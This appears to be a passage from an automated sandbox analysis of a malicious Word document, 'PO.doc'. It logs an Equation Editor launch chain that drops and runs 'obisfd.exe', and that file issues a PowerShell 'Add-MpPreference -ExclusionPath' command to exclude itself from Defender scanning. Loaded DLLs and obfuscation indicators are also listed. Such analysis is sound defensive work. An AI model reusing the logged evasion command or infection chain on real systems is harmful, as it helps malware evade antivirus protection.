                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<................!.........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<................".........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<................".........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....8".........................s............X.......$.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<...............D".........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<...............\".........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<...............o".........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............X.......2.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<................".........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<................".........................s....................l.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<................#.........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......<...............5#.........................s............X...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......<...............A#.........................s............X...............................Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: PO.docReversingLabs: Detection: 50%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obisfd.exe "C:\Users\user\AppData\Roaming\obisfd.exe"
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe"
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess created: C:\Users\user\AppData\Roaming\obisfd.exe "C:\Users\user\AppData\Roaming\obisfd.exe"
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obisfd.exe "C:\Users\user\AppData\Roaming\obisfd.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess created: C:\Users\user\AppData\Roaming\obisfd.exe "C:\Users\user\AppData\Roaming\obisfd.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                Source: PO.LNK.0.drLNK file: ..\..\..\..\..\Desktop\PO.doc
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\obisfd.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: kdcB.pdbSHA256 source: EQNEDT32.EXE, 00000002.00000002.397637969.000000000063F000.00000004.00000020.00020000.00000000.sdmp, 6FfzLi8FyhIIqWu[1].exe.2.dr, obisfd.exe.2.dr
                Source: Binary string: kdcB.pdb source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.397637969.000000000063F000.00000004.00000020.00020000.00000000.sdmp, 6FfzLi8FyhIIqWu[1].exe.2.dr, obisfd.exe.2.dr

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 6FfzLi8FyhIIqWu[1].exe.2.dr, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                Source: obisfd.exe.2.dr, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, V9JX8gvNK4hEI9Xqap.cs.Net Code: n3GdsxLZCD System.Reflection.Assembly.Load(byte[])
                Source: 5.2.obisfd.exe.27e4724.2.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, V9JX8gvNK4hEI9Xqap.cs.Net Code: n3GdsxLZCD System.Reflection.Assembly.Load(byte[])
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, V9JX8gvNK4hEI9Xqap.cs.Net Code: n3GdsxLZCD System.Reflection.Assembly.Load(byte[])
                Source: 5.2.obisfd.exe.480000.0.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00648F60 push eax; retf 2_2_00648F61
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00651448 push ecx; retf 003Dh2_2_00651449
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00654126 push edx; ret 2_2_00654127
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0065412E push edx; ret 2_2_0065412F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00651005 push ecx; retf 003Dh2_2_00651011
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006401F4 push eax; retf 2_2_006401F5
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002C48DC push eax; retf 5_2_002C4939
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002CB92E pushfd ; retf 001Ch5_2_002CB92F
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002C8B47 pushad ; iretd 5_2_002C8B55
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003021AD push ebx; iretd 7_2_003021EA
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003021FD push ebx; iretd 7_2_003021EA
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F90F8 pushfd ; retn 004Dh7_2_004F90F9
                Source: 6FfzLi8FyhIIqWu[1].exe.2.drStatic PE information: section name: .text entropy: 7.985533302881442
                Source: obisfd.exe.2.drStatic PE information: section name: .text entropy: 7.985533302881442
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, mm6tSkHBXiT9hApjPn.csHigh entropy of concatenated method names: 'UxS4EUORUj', 'fQH4eZItGc', 'EiQA73H0hP', 'MmdAaIohye', 'G8K4vQhJSL', 'kCo4F4WUd9', 'sfX4fJKKEh', 'K9A45P7IBS', 'SaK49MAKae', 'WbJ4X9nA5P'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, WptP8nY308ucvUe10D4.csHigh entropy of concatenated method names: 'bfBc61ZYFa', 'qvtcY4Zrwe', 'AGAcs5kDdd', 'GmwcDVHDqu', 'YqYctmTAgw', 'gfkcMRpWZZ', 's7ocUgFpat', 'KxTcHdkXah', 'iEWcQaM4iU', 'Rc8co1JJJd'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, QDA4wYAQtjtLDuMu1u.csHigh entropy of concatenated method names: 'ed6AIbclgZ', 'efTA8EeHcJ', 'g0mAyX5JAR', 'FoKALNCQml', 'aA6APtHBnn', 'ovOA1IFQx8', 'K8ZArDBY68', 'EPYApIONqr', 'mvEAZqkwWA', 'TY1ANasOKR'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, Y0I6CkI3xEBkKXRjRu.csHigh entropy of concatenated method names: 'FBh1Isd70j', 'FCD1y5vh6B', 'H7l1PTGNTf', 'Sk3PeABOE6', 'KQVPzQ6Ynf', 'VLY17jjmK0', 'AQ91aIdtbc', 'eMq1lFEngE', 'oX21Rxffeo', 'dKL1dUldyd'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, YMIMiHg8npgvZDB1j3.csHigh entropy of concatenated method names: 'oVZAkjsgTR', 'MBWAgM2Gsa', 'eG0A3MpaQc', 'oXQAW4PB5M', 'VDPA55KDjj', 'VQbAT3ZeVi', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, ixMUegJB669oosM1rc.csHigh entropy of concatenated method names: 'qhgcaaujr7', 'byFcRdH8Fq', 'gFycdtWgNF', 'BZycIKlDca', 'QtYc8Kn8dF', 'YTXcLt3vXc', 'U3pcPfC1ye', 'N5SAwQLEVx', 'XLIAEbCRAM', 'OISAi0WmIP'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, CTFYYSwldjLLtdLFTJ.csHigh entropy of concatenated method names: 'fgO85qhsVT', 'IEA89dMfFv', 'GTZ8XEjGGB', 'hoK8SlLafS', 'tUS8xN603L', 'i6U80faeV1', 'cKx8w8Q4cb', 'ltU8E9onNc', 'lYv8i0JlvO', 'k2d8eymfuK'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, nisEPcnW8SFm6Q8jGV.csHigh entropy of concatenated method names: 'O8I16mvZD9', 'Qm31Y3iMjh', 'Hv61s6mK2m', 'XRG1DcssA3', 'MNh1t36X5i', 'E2K1MSG9E4', 'jUR1U4Wqr8', 'DBJ1HfjTew', 'H3C1QHZ96v', 'Ybm1omOvki'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, drVBwe0HB5eHSObKlH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oN6liKSs7E', 'OGOledTZ8a', 'GG6lzkQMU1', 'c3dR7ATRPF', 'wScRa8HfFy', 'ng0Rl0shel', 'TvqRRgEBTa', 'SOQeM6Fnlvh3BJDCI3A'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, RDvQApZfaEZ3ekZ6hi.csHigh entropy of concatenated method names: 'ToString', 'TbIGvVhtld', 'uqOGgipZJi', 'PocG3k3kA9', 'GFCGWu861G', 'l1tGT41Uaj', 'u18GhRdLyA', 'sYcGB2FBE3', 'SfdGJMH52I', 'RwoGmKropx'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, GIvqWG73ShWIBwRXj9.csHigh entropy of concatenated method names: 'PZKa1FZbeO', 'u2narsv7TE', 'qiGaZKiceD', 'tdNaN9c3P1', 'SGTajEVaKk', 'dAIaGlRwAw', 'MsYgUvjJIeSk5xKNAo', 'T0NsXNGiYRtDkjpVmT', 'sOEaaXU7wY', 'qMSaRS6XSa'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, a9D6tHXAVfLQ7AVvAh.csHigh entropy of concatenated method names: 'lTIjukLRw2', 'kN0jFOxnNo', 'kRFj50PJSR', 'mPBj9aTjVa', 'IC6jgovihg', 'WV8j3cD8pJ', 'mJFjWMRiLb', 'fl4jTM6Mdx', 'HRZjhPZB24', 'J4KjBATO2s'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, LXDrUhKsbsaSdMig3u.csHigh entropy of concatenated method names: 'OPZyD3UAjy', 'i75yMgkPHn', 'sMmyHcXLdH', 'GjJyQBMWQd', 'VPKyj9mUPr', 'JctyGwbVDI', 'e2ny4v6TSu', 'YcmyAalwbG', 'vdMycuFFJd', 'FrcyC6GDRS'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, V9JX8gvNK4hEI9Xqap.csHigh entropy of concatenated method names: 'FIyRKHyJR1', 'hM2RIUXoZx', 'PSiR8a7umL', 'XhfRyJBTFP', 'ARCRLUKfoI', 'vm9RPnFoah', 'fg9R1dLMvI', 'mAGRrnihkU', 'VMtRp4qlZL', 'FMbRZBVBte'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, QVjhpwcQk0xIgItUxU.csHigh entropy of concatenated method names: 'ExfqH6Ecbu', 'dULqQCZuDi', 'm9UqkZukWK', 'EEQqgY9cEc', 'hEJqW2agov', 'boKqTofQ4g', 'qAiqBXkPDl', 'llBqJjBR97', 'NsvquSm4Yw', 'yHtqvcDg9F'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, nuWOm92koeAgoyXSGZ.csHigh entropy of concatenated method names: 'dxc6fbR9trHoKxZZu1k', 'TEuXWnRflFgmExBRCdO', 'L5OPAutpGf', 'R5MPcaMO0b', 'NPhPCDJcwl', 'mS18SrRbJ4IwiOons2F', 'xBYE4YRNbDGfimWUgIh'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, iQc3ChMdCJOJTr7QxW.csHigh entropy of concatenated method names: 'UMts3tc6O', 'D7pDZ7QkB', 'i9MMOxNE6', 'VvsUd3jKp', 'dngQrkLnt', 'orroTtrdC', 'an9rxLqlcPikeyW33Y', 'meJGqB246S5snqtB8X', 'sAqA293U5', 'TJgCd9Iuq'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, Ik0n13sPA6S1MPxvXW.csHigh entropy of concatenated method names: 'INFPKOe4yM', 'plPP8wtZqd', 'AuSPLeToWk', 'QFPP1fgNZL', 'V7KPr3BZTc', 's3oLxQOtg6', 'QlIL03bIyL', 'fQQLweeTg0', 'r8CLEYX9tV', 'iI7LidLL7P'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, tSHRJ9Ykvh9h1q7IY5g.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'u9qC5Gehl4', 'jxEC9TDkp8', 'XpWCXjdDNO', 't0rCSiZRGE', 'zL3CxSiVpn', 'DJeC0PwRqi', 'wUuCwYHxTo'
                Source: 5.2.obisfd.exe.3a6cd50.6.raw.unpack, WJt0PY4tr3EXWlCgiy.csHigh entropy of concatenated method names: 'Dispose', 'mfdaind5Q2', 'hyolgvCPxm', 'Lvb22g9wVe', 'YtdaewiR5E', 'iIwazEOTGn', 'ProcessDialogKey', 'NjKl79amdT', 'npelaPZbjW', 'OpCllD0FVI'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, mm6tSkHBXiT9hApjPn.csHigh entropy of concatenated method names: 'UxS4EUORUj', 'fQH4eZItGc', 'EiQA73H0hP', 'MmdAaIohye', 'G8K4vQhJSL', 'kCo4F4WUd9', 'sfX4fJKKEh', 'K9A45P7IBS', 'SaK49MAKae', 'WbJ4X9nA5P'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, WptP8nY308ucvUe10D4.csHigh entropy of concatenated method names: 'bfBc61ZYFa', 'qvtcY4Zrwe', 'AGAcs5kDdd', 'GmwcDVHDqu', 'YqYctmTAgw', 'gfkcMRpWZZ', 's7ocUgFpat', 'KxTcHdkXah', 'iEWcQaM4iU', 'Rc8co1JJJd'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, QDA4wYAQtjtLDuMu1u.csHigh entropy of concatenated method names: 'ed6AIbclgZ', 'efTA8EeHcJ', 'g0mAyX5JAR', 'FoKALNCQml', 'aA6APtHBnn', 'ovOA1IFQx8', 'K8ZArDBY68', 'EPYApIONqr', 'mvEAZqkwWA', 'TY1ANasOKR'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, Y0I6CkI3xEBkKXRjRu.csHigh entropy of concatenated method names: 'FBh1Isd70j', 'FCD1y5vh6B', 'H7l1PTGNTf', 'Sk3PeABOE6', 'KQVPzQ6Ynf', 'VLY17jjmK0', 'AQ91aIdtbc', 'eMq1lFEngE', 'oX21Rxffeo', 'dKL1dUldyd'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, YMIMiHg8npgvZDB1j3.csHigh entropy of concatenated method names: 'oVZAkjsgTR', 'MBWAgM2Gsa', 'eG0A3MpaQc', 'oXQAW4PB5M', 'VDPA55KDjj', 'VQbAT3ZeVi', 'Next', 'Next', 'Next', 'NextBytes'
